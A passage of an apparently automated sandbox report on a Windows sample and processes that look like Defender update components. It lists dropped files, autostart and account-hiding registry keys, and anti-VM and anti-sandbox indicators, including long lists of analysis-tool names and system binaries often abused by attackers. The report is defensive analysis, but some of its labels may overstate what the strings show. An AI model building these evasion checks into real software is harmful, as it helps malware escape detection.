Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E304B0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 18_2_00007FF7E304B0C8

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Contains functionality to hide user accounts
Source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\*>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\*>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\*(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\*/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\*>HKLM\Software\Microsoft\Windows Defender Security Center\*\\*-HKCU\SOFTWARE\MICROSOFT\INTERNET 
EXPLORER\\*-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\*2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*
Stores large binary data to the registry
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Key value created or modified: HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18308013985.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18284863225.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18301726224.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18305427613.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18278226414.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Tries to detect Any.run
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18280386458.0000021B5DDC2000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318703518.0000021B5E146000.00000004.00000001.sdmp Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318703518.0000021B5E146000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18280386458.0000021B5DDC2000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18279336685.0000021B5F9E8000.00000004.00000001.sdmp Binary or memory string: |ACCESSCHK.EXE|ACCESSCHK64.EXE|ACCESSENUM.EXE|ACRORD32.EXE|ADEXPLORER.EXE|ADINSIGHT.EXE|ADRESTORE.EXE|APPLICATIONFRAMEHOST.EXE|APPVCLIENT.EXE|APPVLP.EXE|ATBROKER.EXE|AUDIODG.EXE|AUTORUNS.EXE|AUTORUNS64.EXE|AUTORUNSC.EXE|AUTORUNSC64.EXE|BASH.EXE|BGINFO.EXE|BGINFO64.EXE|BITSADMIN.EXE|BROWSER_BROKER.EXE|CALC.EXE|CDB.EXE|CERTUTIL.EXE|CLOCKRES.EXE|CLOCKRES64.EXE|CMD.EXE|CMDKEY.EXE|CMSTP.EXE|CONHOST.EXE|CONSENT.EXE|CONTIG.EXE|CONTIG64.EXE|CONTROL.EXE|COREINFO.EXE|CSC.EXE|CSCRIPT.EXE|CSI.EXE|CSRSS.EXE|CTFMON.EXE|CTRL2CAP.EXE|DASHOST.EXE|DATAEXCHANGEHOST.EXE|DBGVIEW.EXE|DFSVC.EXE|DISK2VHD.EXE|DISKEXT.EXE|DISKEXT64.EXE|DISKSHADOW.EXE|DLLHOST.EXE|DNSCMD.EXE|DNX.EXE|DXCAP.EXE|ESENTUTL.EXE|EXPAND.EXE|EXPLORER.EXE|EXTEXPORT.EXE|EXTRAC32.EXE|FINDLINKS.EXE|FINDLINKS64.EXE|FINDSTR.EXE|FONTDRVHOST.EXE|FORFILES.EXE|FXSSVC.EXE|GPSCRIPT.EXE|GPUP.EXE|HANDLE.EXE|HANDLE64.EXE|HEX2DEC.EXE|HEX2DEC64.EXE|HH.EXE|IE4UINIT.EXE|IEEXEC.EXE|INFDEFAULTINSTALL.EXE|INSTALLUTIL.EXE|JUNCTION.EXE|JUNCTION64.EXE|LDMDUMP.EXE|LIVEKD.EXE|LIVEKD64.EXE|LOADORD.EXE|LOADORD64.EXE|LOADORDC.EXE|LOADORDC64.EXE|LOCKAPP.EXE|LOGONSESSIONS.EXE|LOGONSESSIONS64.EXE|LSAISO.EXE|LSASS.EXE|MAKECAB.EXE|MAVINJECT.EXE|MFTRACE.EXE|MICROSOFTEDGE.EXE|MICROSOFTEDGECP.EXE|MICROSOFTEDGESH.EXE|MSBUILD.EXE|MSCONFIG.EXE|MSDEPLOY.EXE|MSDT.EXE|MSDTC.EXE|MSHTA.EXE|MSIEXEC.EXE|MSXSL.EXE|NETSH.EXE|NLNOTES.EXE|NLTEST.EXE|NOTES.EXE|NOTMYFAULT.EXE|NOTMYFAULT64.EXE|NOTMYFAULTC.EXE|NOTMYFAULTC64.EXE|NTFSINFO.EXE|NTFSINFO64.EXE|NTOSKRNL.EXE|NVUDISP.EXE|NVUHDA6.EXE|ODBCCONF.EXE|OPENWITH.EXE|PAGEDFRG.EXE|PCALUA.EXE|PCWRUN.EXE|PENDMOVES.EXE|PENDMOVES64.EXE|PIPELIST.EXE|PIPELIST64.EXE|POWERSHELL.EXE|PRESENTATIONHOST.EXE|PRINT.EXE|PROCDUMP.EXE|PROCDUMP64.EXE|PROCEXP.EXE|PROCEXP64.EXE|PROCMON.EXE|PSEXEC.EXE|PSEXEC64.EXE|PSFILE.EXE|PSFILE64.EXE|PSGETSID.EXE|PSGETSID64.EXE|PSINFO.EXE|PSINFO64.EXE|PSKILL.EXE|PSKILL64.EXE|PSLIST.EXE|PSLIST6
4.EXE|PSLOGGEDON.EXE|PSLOGGEDON64.EXE|PSLOGLIST.EXE|PSLOGLIST64.EXE|PSPASSWD.EXE|PSPASSWD64.EXE|PSPING.EXE|PSPING64.EXE|PSR.EXE|PSSERVICE.EXE|PSSERVICE64.EXE|PSSHUTDOWN.EXE|PSSUSPEND.EXE|PSSUSPEND64.EXE|PWSH.EXE|RAMMAP.EXE|RCSI.EXE|REG.EXE|REGASM.EXE|REGDELNULL.EXE|REGDELNULL64.EXE|REGEDIT.EXE|REGISTER-CIMPROVIDER|REGJUMP.EXE|REGSVCS.EXE|REGSVR32.EXE|REPLACE.EXE|ROBOCOPY.EXE|ROCCAT_SWARM.EXE|RPCPING.EXE|RUNDLL32.EXE|RUNONCE.EXE|RUNSCRIPTHELPER.EXE|RUNTIMEBROKER.EXE|SC.EXE|SCRIPTRUNNER.EXE|SDELETE.EXE|SDELETE64.EXE|SDIAGNHOST.EXE|SEARCHFILTERHOST.EXE|SEARCHINDEXER.EXE|SEARCHPROTOCOLHOST.EXE|SECURITYHEALTHSERVICE.EXE|SERVICES.EXE|SETTINGSYNCHOST.EXE|SGRMBROKER.EXE|SIGCHECK.EXE|SIGCHECK64.EXE|SIHOST.EXE|SMARTSCREEN.EXE|SMSS.EXE|SPLWOW64.EXE|SPOOLSV.EXE|SPPSVC.EXE|SQLDUMPER.EXE|SQLPS.EXE|SQLTOOLSPS.EXE|STREAMS.EXE|STREAMS64.EXE|SURFACECOLORSERVICE.EXE|SURFACESERVICE.EXE|SVCHOST.EXE|SYNCAPPVPUBLISHINGSERVER.EXE|SYNCHOST.EXE|SYSMON.EXE|SYSMON64.EXE|SYSTEMSETTINGSBROKER.EXE|TASKHOSTW.EXE|TASKMGR.EXE|TCPVCON.EXE|TCPVIEW.EXE|TE.EXE|TRACKER.EXE|USBINST.EXE|VBOXDRVINST.EXE|VMCOMPUTE.EXE|VMMAP.EXE|VMMS.EXE|VSJITD
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: PEBROWSEDBG.EXE
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: $Y!#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLA
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp Binary or memory string: DIR_WATCH.DLL
Source: 1gPmnCR2PX.exe, 00000006.00000002.18689952174.00000000022D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp Binary or memory string: *.LOG.|!\FABRICOBSERVER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp Binary or memory string: #I!#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: 1gPmnCR2PX.exe, 00000006.00000002.18689952174.00000000022D0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: RC:\PROGRAM FILES\WIRESHARK\WIRESHARK.EXE
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: FAKEHTTPSERVER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp Binary or memory string: SNIFF_HIT.EXE
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: BSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\WIRESHARK.EXE
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe TID: 3176 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe TID: 8184 Thread sleep count: 84 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Code function: 22_3_0077A7DC sldt word ptr [eax] 22_3_0077A7DC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: &!*.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 0000000B.00000003.18242140294.0000021B4FF6A000.00000004.00000001.sdmp Binary or memory string: detects_vmware
Source: MpSigStub.exe, 0000000B.00000003.18288234177.0000021B5E77E000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.AVHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
